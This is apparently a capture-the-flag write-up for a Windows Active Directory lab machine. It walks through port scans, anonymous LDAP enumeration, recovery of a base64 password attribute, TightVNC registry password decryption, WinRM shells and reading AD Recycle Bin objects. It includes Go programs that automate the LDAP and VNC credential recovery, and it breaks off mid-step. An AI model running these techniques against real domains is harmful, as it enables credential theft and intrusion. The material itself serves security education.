┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.182
All 1000 scanned ports on 10.10.10.182 (10.10.10.182) are in ignored states.
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.182
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
389/udp open ldap
OS CPE: cpe:/h:allen-bradley:micrologix_1100 cpe:/h:atcom:at-320 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.182
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-26 07:47:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-12-26T07:48:31
|_ start_date: 2023-12-26T07:34:24
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Enumeration: SMB - TCP 445
SMB seems to allow anonymous login, but then shows no shares:
┌──(kali💀kali)-[~]
└─$ smbclient -N -L //10.10.10.182
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.182
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 970
Enumeration: RPC - 445
RPC allows an anonymous connection as well, and through it I am able to list the domain users.
Enumeration: LDAP - TCP 389
LDAP also accepts an anonymous bind. Running ldapsearch against port 389 with the domain base DC=cascade,DC=local dumps the user objects; grepping the output for the userPrincipalName attribute gives the list of UPNs.
That gives us a user list. Now for the CTF-y part: reading the full ldapsearch output rather than just the grep shows a non-standard attribute, cascadeLegacyPwd, on the r.thompson@cascade.local object. Its value is base64 text, and decoding it yields the cleartext password rY4n5eva, which is what is used with smbmap below. A custom attribute holding a password is exactly the kind of thing anonymous LDAP reads expose: it carries no more protection than any other attribute readable by an unauthenticated bind.
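The following is an added example, not code from the original writeup, showing the attribute hunt above done programmatically instead of by eyeballing grep output: it parses ldapsearch's LDIF (unfolding continuation lines and decoding `attr::` base64 values as LDIF requires), then base64-decodes every cascadeLegacyPwd it finds. The embedded LDIF is constructed to mimic what an anonymous bind (something like `ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local'`; the exact command the page used is not shown) returns; the DNs, the folded description and the displayName attribute are assumptions, and the cascadeLegacyPwd value is base64 of the password the page later uses.

```go
package main

import (
	"bufio"
	"encoding/base64"
	"fmt"
	"strings"
)

// Constructed sample in the shape of ldapsearch LDIF output. Only the
// r.thompson entry carries the legacy attribute; the second entry exists to
// exercise line folding (leading space continues the previous line) and the
// "attr:: base64" form ldapsearch uses for non-printable values.
const sampleLDIF = `# extended LDIF
#
# LDAPv3
# base <DC=cascade,DC=local> with scope subtree
# filter: (objectClass=person)
# requesting: ALL
#

# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: user
cn: Ryan Thompson
sAMAccountName: r.thompson
userPrincipalName: r.thompson@cascade.local
cascadeLegacyPwd: clk0bjVldmE=

# Steve Smith, Users, UK, cascade.local
dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: user
cn: Steve Smith
displayName:: U3RldmUgU21pdGg=
description: Legacy account migrated from the old dom
 ain in 2018
sAMAccountName: s.smith
userPrincipalName: s.smith@cascade.local

# search result
search: 2
result: 0 Success

# numResponses: 3
# numEntries: 2
`

// Entry is one LDIF record: attribute name -> values (attributes may repeat).
type Entry map[string][]string

// parseLDIF unfolds continuation lines, drops comments, splits records on
// blank lines, decodes "attr:: base64" values and keeps only records with a dn
// (which discards ldapsearch's trailing "search:/result:" block).
func parseLDIF(ldif string) ([]Entry, error) {
	var lines []string
	sc := bufio.NewScanner(strings.NewReader(ldif))
	for sc.Scan() {
		l := sc.Text()
		if strings.HasPrefix(l, " ") && len(lines) > 0 {
			lines[len(lines)-1] += l[1:] // folded line: strip the one marker space
			continue
		}
		lines = append(lines, l)
	}
	var entries []Entry
	cur := Entry{}
	flush := func() {
		if _, ok := cur["dn"]; ok {
			entries = append(entries, cur)
		}
		cur = Entry{}
	}
	for _, l := range lines {
		switch {
		case l == "":
			flush()
		case strings.HasPrefix(l, "#"):
			// comment line, ignore
		default:
			name, raw, ok := strings.Cut(l, ":")
			if !ok {
				return nil, fmt.Errorf("malformed LDIF line %q", l)
			}
			var val string
			if strings.HasPrefix(raw, ":") { // "attr:: <base64>"
				b, err := base64.StdEncoding.DecodeString(strings.TrimSpace(raw[1:]))
				if err != nil {
					return nil, fmt.Errorf("%s: bad base64 value: %w", name, err)
				}
				val = string(b)
			} else {
				val = strings.TrimLeft(raw, " ")
			}
			cur[name] = append(cur[name], val)
		}
	}
	flush()
	return entries, nil
}

// legacyPasswords maps userPrincipalName -> cleartext for every entry that has
// a cascadeLegacyPwd. The stored value is itself base64 text (that is why the
// LDIF shows it with a single colon), so it is decoded once more here.
func legacyPasswords(entries []Entry) (map[string]string, error) {
	out := map[string]string{}
	for _, e := range entries {
		pw, ok := e["cascadeLegacyPwd"]
		if !ok {
			continue
		}
		b, err := base64.StdEncoding.DecodeString(pw[0])
		if err != nil {
			return nil, fmt.Errorf("%s: cascadeLegacyPwd is not base64: %w", e["dn"][0], err)
		}
		upn := e["dn"][0]
		if u, ok := e["userPrincipalName"]; ok {
			upn = u[0]
		}
		out[upn] = string(b)
	}
	return out, nil
}

func main() {
	entries, err := parseLDIF(sampleLDIF)
	if err != nil {
		panic(err)
	}
	for _, e := range entries {
		fmt.Println("user:", e["userPrincipalName"])
	}
	pws, err := legacyPasswords(entries)
	if err != nil {
		panic(err)
	}
	for upn, pw := range pws {
		fmt.Printf("cascadeLegacyPwd for %s decodes to %q\n", upn, pw)
	}
}
```

Feed it a real dump with `ldapsearch ... > users.ldif` and read the file into parseLDIF; a grep for `userPrincipalName` would have missed the folded description here, which is why unfolding comes before anything else.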
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva
[+] IP: 10.10.10.182:445 Name: cascade.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ NO ACCESS
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
By taking a look at the Data share, we found multiple folders. In a real-world scenario, adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives. With the previously discovered shares, let’s see if we can find interesting files.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as IT/Email Archives/Meeting_Notes_June_2018.html (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log (1.0 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as IT/Logs/DCs/dcdiag.log (4.7 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as IT/Temp/s.smith/VNC Install.reg (2.1 KiloBytes/sec) (average 2.4 KiloBytes/sec)
Done. Let’s start with Meeting_Notes_June_2018.html. The notes mention a temporary administrator account, TempAdmin, created with the same password as the normal admin account, so those two things are what I’ll keep an eye out for.
VNC Install.reg is interesting too. The file is UTF-16 (the encoding Windows uses for .reg exports), so it looks ugly in less or vim, but cat renders it fine (or convert it with iconv -f UTF-16 -t UTF-8). The line "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f jumped out as interesting.
Crack TightVNC Password:
Some reading about TightVNC shows that it stores the password in the registry "encrypted" with a static DES key. Every VNC flavour descended from the original AT&T code uses the same key, so this protects nothing against anyone who can read the value; it is obfuscation, not encryption, and the same trick recovers passwords from backups of the registry key like this .reg file. The stored value is a single 8-byte DES block, which is also why VNC passwords are capped at 8 characters. There are plenty of tools and one-liners to reverse it; the one I used pipes the hex string through xxd -r -p to turn it into raw bytes and then DES-decrypts those with the fixed key. Decrypting the password is as simple as that:
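The decryption described above, as an added example that is not part of the original writeup: it uses Go's standard crypto/des and the key as it appears in the VNC source (a known constant, not something taken from this page). The one detail most one-liners hide is that VNC's bundled d3des consumes each key byte LSB-first, so a standard DES implementation needs every key byte bit-reversed before it produces the same key schedule; the code derives that form rather than hard-coding it. The ciphertext fed in is the "Password" value from the .reg file above.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// The fixed key shared by VNC implementations derived from the original AT&T
// code (TightVNC among them), in the byte order the VNC source writes it.
var vncKey = [8]byte{0x17, 0x52, 0x6b, 0x06, 0x23, 0x4e, 0x58, 0x07}

// reverseBits mirrors the 8 bits of one byte. VNC's d3des.c reads key bytes
// LSB-first, so an MSB-first DES (Go, OpenSSL, pycryptodome) must be given
// each key byte bit-reversed to compute the same schedule.
func reverseBits(b byte) byte {
	var r byte
	for i := 0; i < 8; i++ {
		r = r<<1 | b&1
		b >>= 1
	}
	return r
}

// standardDESKey returns vncKey in the form a standard DES library expects.
func standardDESKey() []byte {
	k := make([]byte, 8)
	for i, b := range vncKey {
		k[i] = reverseBits(b)
	}
	return k
}

// decryptVNCPassword accepts the "Password"=hex:6b,cf,... value from a .reg
// export (commas, spaces and the hex: prefix are stripped) or a plain hex
// string, and returns the cleartext. The stored value is exactly one DES
// block in ECB mode holding the password NUL-padded to 8 bytes, so anything
// of another length is rejected rather than silently truncated.
func decryptVNCPassword(regHex string) (string, error) {
	clean := strings.NewReplacer("hex:", "", ",", "", " ", "").Replace(regHex)
	ct, err := hex.DecodeString(clean)
	if err != nil {
		return "", fmt.Errorf("bad hex: %w", err)
	}
	if len(ct) != des.BlockSize {
		return "", fmt.Errorf("expected %d bytes, got %d", des.BlockSize, len(ct))
	}
	block, err := des.NewCipher(standardDESKey())
	if err != nil {
		return "", err
	}
	pt := make([]byte, des.BlockSize)
	block.Decrypt(pt, ct) // single block: ECB and CBC-with-zero-IV coincide
	return strings.TrimRight(string(pt), "\x00"), nil
}

func main() {
	// value taken from the VNC Install.reg found on the Data share
	pw, err := decryptVNCPassword(`"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f`[12:])
	if err != nil {
		panic(err)
	}
	fmt.Printf("standard-form DES key: %x\n", standardDESKey())
	fmt.Printf("password: %q\n", pw)
}
```

The same routine works on a Linux ~/.vnc/passwd file, which holds the identical 8-byte block; if a decrypt returns garbage, the first thing to check is whether the key was bit-reversed, since the unreversed key still "works" in the sense of producing 8 bytes.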
The decrypted password works for s.smith over WinRM, which fits: the reg file sat under IT\Temp\s.smith and s.smith is in Remote Management Users.
*Evil-WinRM* PS C:\Users\s.smith\Desktop> type user.txt
39a92c------------------------------
Privesc: s.smith –> arksvc
Enumeration:
*Evil-WinRM* PS C:\Users\s.smith\Desktop> net user s.smith
User name                    s.smith
Full Name                    Steve Smith
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/28/2020 7:58:05 PM
Password expires             Never
Password changeable          1/28/2020 7:58:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 MapAuditDrive.vbs
User profile
Home directory
Last logon                   1/28/2020 11:26:39 PM

Logon hours allowed          All

Local Group Memberships      *Audit Share          *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\s.smith\Desktop> systeminfo
Program 'systeminfo.exe' failed to run: Access is denied
At line:1 char:1
*Evil-WinRM* PS C:\Users\s.smith\Desktop> net localgroup "Audit Share"
Alias name     Audit Share
Comment        \\Casc-DC1\Audit$

Members

-------------------------------------------------------------------------------
s.smith
The command completed successfully.
s.smith is the only user in the group, but the comment is a useful hint to look at this share. There’s a c:\shares, but I don’t have permissions to list the directories in it:
*Evil-WinRM* PS C:\Shares> dir
Access to the path 'C:\Shares' is denied.
However, I can just go into Audit based on the share name in the comment:
*Evil-WinRM* PS C:\Shares> cd Audit
*Evil-WinRM* PS C:\Shares\Audit> dir

    Directory: C:\Shares\Audit

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/28/2020   9:40 PM                DB
d-----        1/26/2020  10:25 PM                x64
d-----        1/26/2020  10:25 PM                x86
-a----        1/28/2020   9:46 PM          13312 CascAudit.exe
-a----        1/29/2020   6:00 PM          12288 CascCrypto.dll
-a----        1/28/2020  11:29 PM             45 RunAudit.bat
-a----       10/27/2019   6:38 AM         363520 System.Data.SQLite.dll
-a----       10/27/2019   6:38 AM         186880 System.Data.SQLite.EF6.dll
The DB folder holds an SQLite database, Audit.db. Dumping its tables, nothing jumped out as particularly interesting. I thought the Ldap table could have had a password in it, but the base64-encoded value there doesn’t decode to ASCII, so it is presumably encrypted rather than merely encoded, and the binary that reads the database is the obvious place to look for how.
CascAudit.exe:
RunAudit.bat shows that CascAudit.exe is run with the db file as an argument:
┌──(kali💀kali)-[~/Desktop]
└─$ file CascAudit.exe
CascAudit.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
I’ll jump over to a Windows VM and use dnSpy to take a look. In MainModule there’s the routine that does the work:
It opens an SQLite connection to the database passed as an argument, reads the Ldap table, and decrypts the password using key material hardcoded in the assembly. Since everything needed is inside the binary, the plaintext can be recovered either by reimplementing the decryption or, more simply, by letting the program do it under a debugger.
I went with debugging. I put a breakpoint on line 53, where the SQL connection is closed (by then the decrypted string is sitting in a local). Then Debug -> Start Debugging…, setting the Argument to the path of my copy of Audit.db:
On hitting OK, it runs to the breakpoint, and I can see the decrypted password in the Locals window:
Based on the line in the SQLite DB, this password, w3lc0meFr31nd, likely pairs with the account arksvc.
WinRM:
crackmapexec confirms that the password works for arksvc and, since the account is in Remote Management Users, that it also gives a WinRM shell:
*Evil-WinRM* PS C:\Users\arksvc\Documents> net user arksvc
User name                    arksvc
Full Name                    ArkSvc
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/9/2020 4:18:20 PM
Password expires             Never
Password changeable          1/9/2020 4:18:20 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/29/2020 9:05:40 PM

Logon hours allowed          All

Local Group Memberships      *AD Recycle Bin       *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.
AD Recycle:
AD Recycle Bin is not a built-in Windows group, but its name points at a well-known feature. Active Directory Object Recovery (the AD Recycle Bin) was added in Server 2008 R2 to let administrators restore deleted objects, much as the file recycle bin does, and it works by keeping a deleted object, attributes and all, for the tombstone lifetime (180 days by default) instead of stripping it down. Reading those objects needs rights on the Deleted Objects container that ordinary users lack; a custom group with this name presumably delegates them, which is what makes arksvc interesting. The referenced article gives a PowerShell command to query all of the deleted objects within a domain:
The last one is really interesting, because it’s the temporary administrator account mentioned in the old email I found earlier (which also said it was using the same password as the normal admin account). Because the recycle bin preserves attributes, anything that was set on the live account, a cascadeLegacyPwd attribute included, is worth checking on the deleted object. I can get all the details for that account: